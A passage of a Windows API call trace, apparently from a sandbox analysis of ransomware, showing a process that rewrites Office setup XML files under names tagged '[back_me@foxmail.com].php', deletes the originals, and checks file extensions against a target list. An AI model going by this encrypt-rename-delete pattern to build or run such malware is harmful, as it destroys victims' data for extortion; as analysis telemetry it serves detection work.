WriteFile (in: hFile=0x21c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x330, lpOverlapped=0x0) returned 1 [0042.199] ReadFile (in: hFile=0x218, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.200] WriteFile (in: hFile=0x21c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0042.200] SetEndOfFile (hFile=0x21c) returned 1 [0042.200] CloseHandle (hObject=0x21c) returned 1 [0042.200] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.200] SetEndOfFile (hFile=0x218) returned 1 [0042.201] CloseHandle (hObject=0x218) returned 1 [0042.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.201] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 1 [0042.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.202] lstrlenW (lpString=".doc") returned 4 [0042.202] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.202] lstrlenW (lpString=".docx") returned 5 [0042.202] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0042.202] lstrlenW (lpString=".pdf") returned 4 [0042.202] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.202] lstrlenW (lpString=".xls") returned 4 [0042.202] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.202] lstrlenW (lpString=".xlsx") returned 5 [0042.202] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0042.202] lstrlenW (lpString=".ppt") returned 4 [0042.202] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.202] lstrlenW (lpString=".zip") returned 4 [0042.202] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.202] lstrlenW (lpString=".rar") returned 4 [0042.202] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.202] lstrlenW (lpString=".bz2") returned 4 [0042.202] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.202] lstrlenW (lpString=".7z") returned 3 [0042.202] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.202] lstrlenW (lpString=".dbf") returned 4 [0042.202] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.203] lstrlenW (lpString=".1cd") returned 4 [0042.203] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.203] lstrlenW (lpString=".jpg") returned 4 [0042.203] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.203] lstrlenW (lpString=".doc") returned 4 [0042.203] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString=".docx") returned 5 [0042.203] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0042.203] lstrlenW (lpString=".pdf") returned 4 [0042.203] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString=".xls") returned 4 [0042.203] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString=".xlsx") returned 5 [0042.203] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0042.203] lstrlenW (lpString=".ppt") returned 4 [0042.203] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.203] lstrlenW (lpString=".zip") returned 4 [0042.203] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.203] lstrlenW (lpString=".rar") returned 4 [0042.203] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString=".bz2") returned 4 [0042.203] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.203] lstrlenW (lpString=".7z") returned 3 [0042.203] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.203] lstrlenW (lpString=".dbf") returned 4 [0042.203] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.204] lstrlenW (lpString=".1cd") returned 4 [0042.204] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0042.204] lstrlenW (lpString=".jpg") returned 4 [0042.204] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.204] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.204] lstrlenW (lpString="SETUP.XML") returned 9 [0042.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.235] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=31094) returned 1 [0042.235] CloseHandle (hObject=0x21c) returned 1 [0042.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 0x20 [0042.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.235] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.235] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.236] GetLastError () returned 0x0 [0042.236] ReadFile (in: hFile=0x21c, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x7976, lpOverlapped=0x0) returned 1 [0042.237] WriteFile (in: hFile=0x208, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x7980, lpOverlapped=0x0) returned 1 [0042.239] ReadFile (in: hFile=0x21c, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.239] WriteFile (in: hFile=0x208, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.239] SetEndOfFile (hFile=0x208) returned 1 [0042.239] CloseHandle (hObject=0x208) returned 1 [0042.240] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.240] SetEndOfFile (hFile=0x21c) returned 1 [0042.241] CloseHandle (hObject=0x21c) returned 1 [0042.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.241] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 1 [0042.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.241] lstrlenW (lpString=".doc") returned 4 [0042.241] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.241] lstrlenW (lpString=".docx") returned 5 [0042.241] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.241] lstrlenW (lpString=".pdf") returned 4 [0042.241] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString=".xls") returned 4 [0042.242] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString=".xlsx") returned 5 [0042.242] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.242] lstrlenW (lpString=".ppt") returned 4 [0042.242] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.242] lstrlenW (lpString=".zip") returned 4 [0042.242] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.242] lstrlenW (lpString=".rar") returned 4 [0042.242] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString=".bz2") returned 4 [0042.242] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString=".7z") returned 3 [0042.242] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.242] lstrlenW (lpString=".dbf") returned 4 [0042.242] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.242] lstrlenW (lpString=".1cd") returned 4 [0042.242] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.242] lstrlenW (lpString=".jpg") returned 4 [0042.242] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.242] lstrlenW (lpString=".doc") returned 4 [0042.242] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.242] lstrlenW (lpString=".docx") returned 5 [0042.242] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.242] lstrlenW (lpString=".pdf") returned 4 [0042.243] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.243] lstrlenW (lpString=".xls") returned 4 [0042.243] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.243] lstrlenW (lpString=".xlsx") returned 5 [0042.243] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.243] lstrlenW (lpString=".ppt") returned 4 [0042.243] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.243] lstrlenW (lpString=".zip") returned 4 [0042.243] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.243] lstrlenW (lpString=".rar") returned 4 [0042.243] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.243] lstrlenW (lpString=".bz2") returned 4 [0042.243] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.243] lstrlenW (lpString=".7z") returned 3 [0042.243] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.243] lstrlenW (lpString=".dbf") returned 4 [0042.243] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.243] lstrlenW (lpString=".1cd") returned 4 [0042.243] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0042.243] lstrlenW (lpString=".jpg") returned 4 [0042.243] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.243] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.243] lstrlenW (lpString="PublisherMUI.XML") returned 16 [0042.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.244] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1450) returned 1 [0042.244] CloseHandle (hObject=0x21c) returned 1 [0042.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 0x20 [0042.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.244] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.244] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.246] GetLastError () returned 0x0 [0042.246] ReadFile (in: hFile=0x21c, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0042.247] WriteFile (in: hFile=0x208, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0042.248] ReadFile (in: hFile=0x21c, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.248] WriteFile (in: hFile=0x208, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0042.249] SetEndOfFile (hFile=0x208) returned 1 [0042.249] CloseHandle (hObject=0x208) returned 1 [0042.249] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.249] SetEndOfFile (hFile=0x21c) returned 1 [0042.250] CloseHandle (hObject=0x21c) returned 1 [0042.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.250] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 1 [0042.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.251] lstrlenW (lpString=".doc") returned 4 [0042.251] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString=".docx") returned 5 [0042.251] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0042.251] lstrlenW (lpString=".pdf") returned 4 [0042.251] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString=".xls") returned 4 [0042.251] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString=".xlsx") returned 5 [0042.251] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0042.251] lstrlenW (lpString=".ppt") returned 4 [0042.251] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.251] lstrlenW (lpString=".zip") returned 4 [0042.251] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.251] lstrlenW (lpString=".rar") returned 4 [0042.251] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString=".bz2") returned 4 [0042.251] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString=".7z") returned 3 [0042.251] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.251] lstrlenW (lpString=".dbf") returned 4 [0042.251] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.251] lstrlenW (lpString=".1cd") returned 4 [0042.251] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.252] lstrlenW (lpString=".jpg") returned 4 [0042.252] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.252] lstrlenW (lpString=".doc") returned 4 [0042.252] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString=".docx") returned 5 [0042.252] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0042.252] lstrlenW (lpString=".pdf") returned 4 [0042.252] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString=".xls") returned 4 [0042.252] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString=".xlsx") returned 5 [0042.252] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0042.252] lstrlenW (lpString=".ppt") returned 4 [0042.252] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.252] lstrlenW (lpString=".zip") returned 4 [0042.252] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.252] lstrlenW (lpString=".rar") returned 4 [0042.252] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString=".bz2") returned 4 [0042.252] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString=".7z") returned 3 [0042.252] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.252] lstrlenW (lpString=".dbf") returned 4 [0042.252] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.252] lstrlenW (lpString=".1cd") returned 4 [0042.252] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0042.253] lstrlenW (lpString=".jpg") returned 4 [0042.253] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.253] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.253] lstrlenW (lpString="SETUP.XML") returned 9 [0042.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0042.574] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1608) returned 1 [0042.575] CloseHandle (hObject=0x214) returned 1 [0042.575] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 0x20 [0042.575] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 